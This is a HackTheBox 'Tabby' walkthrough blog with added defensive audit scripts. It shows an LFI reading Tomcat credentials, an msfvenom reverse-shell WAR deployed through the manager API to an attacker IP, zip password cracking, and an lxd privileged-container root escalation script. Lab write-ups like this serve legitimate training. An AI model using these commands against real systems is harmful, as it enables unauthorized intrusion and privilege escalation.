Lluna's Pure land.

HTB-[tabby]

0x00. Overview

0x01. Information gathering

We can see that ports 22, 80 and 8080 (Tomcat) are open.

root@JIYE:~/htb/tabby# nmap -sC -sV -sT 10.10.10.194 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 02:59 EDT
Nmap scan report for 10.10.10.194
Host is up (0.39s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.64 seconds
root@JIYE:~/htb/tabby#

0x02. Visiting port 80 first

It turns out to be a site selling servers (hosting).

Crawling the site by hand, the NEWS page cannot be opened and redirects to the following page.

After adding a hosts entry and visiting again, the page mentions a data breach, and it looks like there is a file inclusion.

10.10.10.194 megahosting.htb

Testing the file inclusion confirms that it really exists.

0x03. Visiting Tomcat

1. Sensitive directories and files found

/var/lib/tomcat9/webapps/ROOT/index.html

/usr/share/tomcat9

/var/lib/tomcat9

/usr/share/doc/tomcat9-common/RUNNING.txt.gz

/etc/tomcat9/tomcat-users.xml

2. Including sensitive files

A Baidu search shows that tomcat-users.xml is the user login configuration file.

After persistent effort, the file location was found:

/usr/share/tomcat9/etc/tomcat-users.xml

Viewing the page source reveals the username and password.
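
As an added example (not part of the original post), the defender's counterpart of this step: audit a tomcat-users.xml for accounts that hold Manager roles and check whether their passwords are stored in clear text, which is exactly the configuration that leaked here. The sample XML, usernames and passwords below are constructed placeholders, and the digest-format check is a heuristic.

```python
# Added example, not from the original post: audit a tomcat-users.xml for accounts
# that can push code through the Manager app, and whether their passwords are in
# clear text. On this box the file was read through the LFI and handed over a
# manager-script account, which is exactly the configuration this flags.
import re
import xml.etree.ElementTree as ET

# Roles that let a caller deploy or reconfigure applications via /manager or /host-manager.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
# Tomcat's salted digest credentials look like "<salt>$<iterations>$<hex digest>";
# anything else is treated as a clear-text password (heuristic).
DIGEST_RE = re.compile(r"^[0-9a-fA-F]+\$\d+\$[0-9a-fA-F]+$")

# Constructed sample in the layout of /etc/tomcat9/tomcat-users.xml; the usernames
# and passwords are placeholders, not values from the box.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="probe"/>
  <user username="tomcat" password="ClearTextPlaceholder1" roles="admin-gui,manager-script"/>
  <user username="deployer" password="5f2a9c1e$10000$0c3b9f1d2e4a5b6c7d8e9f0a1b2c3d4e" roles="manager-script"/>
  <user username="viewer" password="ClearTextPlaceholder2" roles="probe"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return one finding per user holding a deploy-capable role."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        # Strip the XML namespace so the match works with or without xmlns.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        risky = sorted(roles & DEPLOY_ROLES)
        if not risky:
            continue
        password = el.get("password") or ""
        findings.append({
            "user": el.get("username") or el.get("name") or "",
            "deploy_roles": risky,
            "cleartext_password": not DIGEST_RE.match(password),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```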

0x04. Building the exploit

Tomcat-related reference

Generate the exploit

root@JIYE:~/htb/tabby# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.17.216 lport=6666 -f war > exp.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@JIYE:~/htb/tabby#

Upload the exploit

root@JIYE:~/htb/tabby# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exp.war "http://10.10.10.194:8080/manager/text/deploy?path=/exp.war"
OK - Deployed application at context path [/exp.war]
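
As an added example (not from the original post), the detection side of this upload: the deployment is one PUT to /manager/text/deploy that Tomcat answers with 200, so it shows up in the access log. The log lines below are constructed in the AccessLogValve "common" format, and the addresses, timestamps and the trusted-deployer host are placeholders.

```python
# Added example, not from the original post: flag Manager deployments in a Tomcat
# access log. The WAR upload in this walkthrough is a single PUT to
# /manager/text/deploy, so the access log is where a defender sees it.
import re
from urllib.parse import parse_qs, urlsplit

# AccessLogValve "common" pattern: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Manager endpoints that install or replace application code.
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload", "/manager/html/deploy")

# Constructed sample lines; source addresses and timestamps are placeholders.
SAMPLE_LOG = """\
10.10.17.216 - - [09/Sep/2020:03:14:55 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.17.216 - tomcat [09/Sep/2020:03:15:22 -0400] "PUT /manager/text/deploy?path=/exp.war HTTP/1.1" 200 58
10.10.17.216 - - [09/Sep/2020:03:15:40 -0400] "GET /exp.war HTTP/1.1" 200 0
192.168.50.5 - cicd [09/Sep/2020:04:00:01 -0400] "PUT /manager/text/deploy?path=/shop&update=true HTTP/1.1" 200 63
"""


def detect_manager_deploys(lines, trusted_sources=frozenset()):
    """Return one alert per request that hit a deploy endpoint, marking whether
    the client address is outside the set of hosts expected to deploy."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format, skip
        url = urlsplit(m["target"])
        if not url.path.startswith(DEPLOY_PATHS):
            continue
        # The context path names the application that was (re)deployed.
        context = parse_qs(url.query).get("path", ["?"])[0]
        alerts.append({
            "source": m["ip"],
            "user": m["user"],
            "context": context,
            "status": m["status"],
            "untrusted_source": m["ip"] not in trusted_sources,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_manager_deploys(SAMPLE_LOG.splitlines(), {"192.168.50.5"}):
        print(alert)
```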

Listen on Kali

root@JIYE:~/htb/tabby# nc -nvlp 6666
listening on [any] 6666 ...

Visit http://10.10.10.194:8080/exp.war to trigger the reverse shell

root@JIYE:~/htb/tabby# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.194] 51532
whoami
tomcat

Upgrade the shell

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$ whoami
whoami
tomcat
tomcat@tabby:/var/lib/tomcat9$

Upgrade to a fully interactive shell

tomcat@tabby:/var/lib/tomcat9$ ^Z
[1]+ 已停止 nc -nvlp 6666
root@JIYE:~/htb/tabby# stty raw -echo
root@JIYE:~/htb/tabby# nc -nvlp 6666

tomcat@tabby:/var/lib/tomcat9$
tomcat@tabby:/var/lib/tomcat9$ whoami
tomcat

0x05. Looking for useful information

In the web root there is a files directory containing a backup .zip file, presumably a backup.

tomcat@tabby:/var/www/html$ ls
assets favicon.ico files index.php logo.png news.php Readme.txt
tomcat@tabby:/var/www/html$ cd files/
tomcat@tabby:/var/www/html/files$ ls
16162020_backup.zip archive revoked_certs statement

Download backup.zip and try to extract it; it asks for a password.

Brute-forcing the extraction password with fcrackzip gives admin@it

root@JIYE:~/htb/tabby# fcrackzip -b -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip 
possible pw found: admin@it ()
root@JIYE:~/htb/tabby#

Extracting it gives a war directory, with nothing of interest inside.

But logging in as ash with admin@it actually worked... what's the logic there~

tomcat@tabby:/home$ ls
ash
tomcat@tabby:/home$ su ash
Password:
ash@tabby:/home$
ash@tabby:/home$ ls
ash
ash@tabby:/home$ cd
ash@tabby:~$ ls
alpine-v3.12-i686-20200909_0437.tar.gz index.html tmp
alpine-v3.12-x86_64-20200909_1417.tar.gz snap user.txt
ash@tabby:~$ cat user.txt
*************************************
ash@tabby:~$

0x06. Privilege escalation

This time, using lxd

LXC/LXD reference 1

LXC/LXD reference 2

First, build the Alpine image

root@JIYE:~/htb/tabby# git clone https://github.com/saghul/lxd-alpine-builder.git
正克隆到 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
展开对象中: 100% (27/27), 15.98 KiB | 185.00 KiB/s, 完成.
root@JIYE:~/htb/tabby# ls
16162020_backup.zip exp.war lxd-alpine-builder nmap.CVT user
root@JIYE:~/htb/tabby# cd lxd-alpine-builder/
root@JIYE:~/htb/tabby/lxd-alpine-builder# ls
build-alpine LICENSE README.md
root@JIYE:~/htb/tabby/lxd-alpine-builder# ./build-alpine
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading alpine-keys-2.2-r0.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.10.5-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: 成功
Verified OK
Selecting mirror http://dl-3.alpinelinux.org/alpine/v3.12/main
fetch http://dl-3.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@JIYE:~/htb/tabby/lxd-alpine-builder#
root@JIYE:~/htb/tabby/lxd-alpine-builder# ls
alpine-v3.12-x86_64-20200909_1548.tar.gz build-alpine LICENSE README.md
root@JIYE:~/htb/tabby/lxd-alpine-builder#

Upload

root@JIYE:~/htb/tabby/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

ash@tabby:/tmp$ wget http://10.10.17.216/exp.sh
--2020-09-10 01:35:29-- http://10.10.17.216/exp.sh
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 582 [text/x-sh]
Saving to: ‘exp.sh’

exp.sh 100%[===================>] 582 --.-KB/s in 0s

2020-09-10 01:35:30 (72.2 MB/s) - ‘exp.sh’ saved [582/582]

ash@tabby:/tmp$ wget http://10.10.17.216/alpine-v3.12-x86_64-20200909_1548.tar.gz
--2020-09-10 01:38:02-- http://10.10.17.216/alpine-v3.12-x86_64-20200909_1548.tar.gz
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3201921 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200909_1548.tar.gz’

alpine-v3.12-x86_64 100%[===================>] 3.05M 665KB/s in 9.5s

2020-09-10 01:38:12 (328 KB/s) - ‘alpine-v3.12-x86_64-20200909_1548.tar.gz’ saved [3201921/3201921]

ash@tabby:/tmp$ ls
alpine-v3.12-x86_64-20200909_1548.tar.gz hsperfdata_tomcat
ash@tabby:/tmp$
root@JIYE:~/htb/tabby/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.194 - - [09/Sep/2020 20:42:27] "GET /alpine-v3.12-x86_64-20200909_1548.tar.gz HTTP/1.1" 200 -

Write the shell script

root@JIYE:~/htb/tabby# cat exp.sh 
#!/bin/bash
echo "--------------lxc image import---------------"
lxc image import ./alpine-v3.12-x86_64-20200909_1548.tar.gz --alias fjy
echo "--------------lxc image list-----------------"
lxc image list
echo "----------lxc container creating-------------"
lxd init
echo "--------lxc security.privileged=true---------"
lxc init fjy fjy-tabby -c security.privileged=true
echo "------------lxc config device----------------"
lxc config device add fjy-tabby mydevice disk source=/ path=/mnt/root recursive=true
echo "--------------lxc starting-------------------"
lxc start fjy-tabby
root@JIYE:~/htb/tabby#
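
As an added example (not from the original post), the two conditions the script above relies on, seen from the defender's side: a user in the lxd group, and a container that is both privileged and has the host's / attached as a disk device. The checks take /etc/group text and `lxc config show <container>` output; the samples below are constructed, not captured from the box, and the gid, container and device names are placeholders.

```python
# Added example, not from the original post: audit the two preconditions of the
# lxd escalation shown in exp.sh. Membership of the lxd group lets an ordinary
# user drive LXD; security.privileged=true plus a disk device with source=/
# turns a container shell into root on the host filesystem.
import re

# Constructed /etc/group excerpt; gid and member names are placeholders.
# Note: /etc/group lists supplementary members only; a user's primary group
# lives in /etc/passwd and is not covered by this check.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
lxd:x:116:ash
docker:x:998:
"""

# Constructed `lxc config show` output in LXD's YAML layout, for a container
# configured the way exp.sh does it.
SAMPLE_CONFIG = """\
architecture: x86_64
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
name: fjy-tabby
"""


def lxd_group_members(group_text):
    """Return the non-root users listed as members of the lxd group."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [m for m in fields[3].split(",") if m and m != "root"]
    return []


def container_escape_risk(config_text):
    """Flag a privileged container that has the host root attached as a disk device."""
    privileged = re.search(r'^\s*security\.privileged:\s*"?true"?\s*$', config_text, re.M) is not None
    host_root = re.search(r'^\s*source:\s*/\s*$', config_text, re.M) is not None
    return {"privileged": privileged, "host_root_mounted": host_root,
            "root_equivalent": privileged and host_root}


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    print("container:", container_escape_risk(SAMPLE_CONFIG))
```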

Upload

root@JIYE:~/htb/tabby# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

ash@tabby:/tmp$ wget http://10.10.17.216/exp.sh
--2020-09-10 01:35:29-- http://10.10.17.216/exp.sh
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 582 [text/x-sh]
Saving to: ‘exp.sh’

exp.sh 100%[===================>] 582 --.-KB/s in 0s

2020-09-10 01:35:30 (72.2 MB/s) - ‘exp.sh’ saved [582/582]

ash@tabby:/tmp$
root@JIYE:~/htb/tabby# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.194 - - [09/Sep/2020 21:06:20] "GET /exp.sh HTTP/1.1" 200 -

Run it

ash@tabby:~/tmp$ ls
alpine-v3.12-x86_64-20200910_2121.tar.gz exp.sh
ash@tabby:~/tmp$ ./exp.sh
--------------lxc image import---------------
--------------lxc image list-----------------
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| fjy | 24645e832789 | no | alpine v3.12 (20200910_21:21) | x86_64 | CONTAINER | 3.05MB | Sep 11, 2020 at 2:31am (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
----------lxc container creating-------------
Would you like to use LXD clustering? (yes/no) [default=no]: yes
What name should be used to identify this node in the cluster? [default=tabby]:
What IP address or DNS name should be used to reach this node? [default=10.10.10.194]:
Are you joining an existing cluster? (yes/no) [default=no]:
Setup password authentication on the cluster? (yes/no) [default=yes]:
Trust password for new clients:
Again:
Do you want to configure a new local storage pool? (yes/no) [default=yes]:
Name of the storage backend to use (zfs, btrfs, dir, lvm) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Do you want to configure a new remote storage pool? (yes/no) [default=no]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]:
Would you like to create a new Fan overlay network? (yes/no) [default=yes]:
What subnet should be used as the Fan underlay? [default=auto]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
--------lxc security.privileged=true---------
Creating fjy-tabby
------------lxc config device----------------
Device mydevice added to fjy-tabby
--------------lxc starting-------------------
ash@tabby:~/tmp$ lxc exec fjy-tabby /bin/sh
~ # ls
~ # whoami
root
~ # cd /mnt/root/
/mnt/root # ls
bin home lost+found root swap.img
boot lib media run sys
cdrom lib32 mnt sbin tmp
dev lib64 opt snap usr
etc libx32 proc srv var
/mnt/root # cd root/
/mnt/root/root # ls
root.txt snap
/mnt/root/root # cat root.txt
*************************
/mnt/root/root #
-------------A short note, long thoughts; see you next time-------------